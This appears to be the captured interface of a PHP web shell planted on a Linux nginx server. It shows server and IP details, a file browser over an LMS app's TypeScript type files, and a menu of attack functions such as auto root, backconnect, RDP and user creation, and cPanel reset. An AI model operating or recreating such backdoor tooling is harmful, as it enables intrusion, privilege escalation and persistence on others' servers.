Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
lms-client /
app /
types /
[ HOME SHELL ]
Name
Size
Permission
Action
index.ts
1.05
KB
-rwxrwxr-x
jest-dom.d.ts
50
B
-rwxrwxr-x
react-intl.d.ts
209
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.ts
import { Reducer, Store } from 'redux'; import { RouterState } from 'connected-react-router'; import { Saga } from 'redux-saga'; import { SagaInjectionModes } from 'redux-injectors'; import { ContainerState as LanguageProviderState } from 'containers/default/LanguageProvider/types'; // [IMPORT NEW CONTAINERSTATE ABOVE] < Needed for generating containers seamlessly export interface InjectedStore extends Store { injectedReducers: any; injectedSagas: any; runSaga(saga: Saga<any[]> | undefined, args: any | undefined): any; } export interface InjectReducerParams { key: keyof ApplicationRootState; reducer: Reducer<any, any>; } export interface InjectSagaParams { key: keyof ApplicationRootState; saga: Saga; mode?: SagaInjectionModes; } // Your root reducer type, which is your redux state types also export interface ApplicationRootState { readonly router: RouterState; readonly language: LanguageProviderState; // [INSERT NEW REDUCER KEY ABOVE] < Needed for generating containers seamlessly // for testing purposes readonly auth: any; }
Close